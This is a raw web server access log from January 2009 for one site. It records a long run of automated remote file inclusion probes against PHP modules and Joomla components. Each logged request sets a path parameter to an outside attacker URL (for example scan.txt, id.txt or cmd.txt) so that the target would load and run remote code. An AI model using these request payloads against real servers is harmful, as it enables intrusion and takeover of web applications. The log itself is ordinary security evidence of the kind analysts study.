119.205.209.69 - - [06/Jan/2009:09:32:13 -0800] "GET /logs/access_080404.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:19 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:19 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:19 -0800] "GET /logs/access_080901.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:20 -0800] "GET /logs/access_080901.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.72.250.130 - - [06/Jan/2009:09:32:20 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:32:24 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:32:24 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [06/Jan/2009:09:32:25 -0800] "GET /logs/access_080901.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:32:26 -0800] "GET /logs/access_080127.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:32:30 -0800] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:30 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:30 -0800] "GET /logs/access_080408.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:30 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:31 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:31 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:31 -0800] "GET /logs/access_080408.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:32:39 -0800] "GET /logs/access_080530.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:32:40 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:44 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:32:44 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:32:45 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:33:04 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.163.203 - - [06/Jan/2009:09:33:05 -0800] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:33:16 -0800] "GET /logs/access_080211.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:33:17 -0800] "GET /logs/access_080424.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:18 -0800] "GET /logs/access_080705.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:33:19 -0800] "GET /logs/access_080211.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:20 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:21 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:33:21 -0800] "GET /logs/access_080809.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:25 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:33:27 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:33:28 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:33:28 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:33:28 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:33:28 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.213.164.118 - - [06/Jan/2009:09:33:30 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.164.118 - - [06/Jan/2009:09:33:30 -0800] "GET /includes/settings.inc.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.213.164.118 - - [06/Jan/2009:09:33:30 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:33:34 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
94.101.145.110 - - [06/Jan/2009:09:33:44 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.101.145.110 - - [06/Jan/2009:09:33:44 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.101.145.110 - - [06/Jan/2009:09:33:44 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:33:45 -0800] "GET /logs/access_080114.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:33:56 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:33:56 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:33:56 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:34:03 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:34:03 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:34:03 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:34:06 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:22 -0800] "GET /logs/access_081202.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:22 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:34:22 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:34:22 -0800] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:23 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:34:25 -0800] "GET /logs/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
77.221.130.2 - - [06/Jan/2009:09:34:25 -0800] "GET /errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:34:25 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:26 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:26 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:26 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:27 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:27 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:27 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:28 -0800] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:28 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:30 -0800] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:34:30 -0800] "GET /logs/access_080102.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:30 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:31 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:34:33 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:34 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:34 -0800] "GET /logs/access_081202.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:09:34:35 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:34:36 -0800] "GET /logs/access_081015.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:34:37 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:34:37 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:34:37 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:34:38 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:34:38 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:34:43 -0800] "GET /logs/access_081125.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:43 -0800] "GET /logs/access_080404.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:34:44 -0800] "GET /logs/access_080404.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:34:48 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:34:48 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:34:48 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
91.196.124.13 - - [06/Jan/2009:09:34:59 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:35:05 -0800] "GET /logs/access_081125.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:35:07 -0800] "GET /logs/access_080131.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:16 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:16 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:35:16 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:35:17 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:35:17 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:09:35:17 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:09:35:21 -0800] "GET /logs//admin/classes/errors.php?error=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
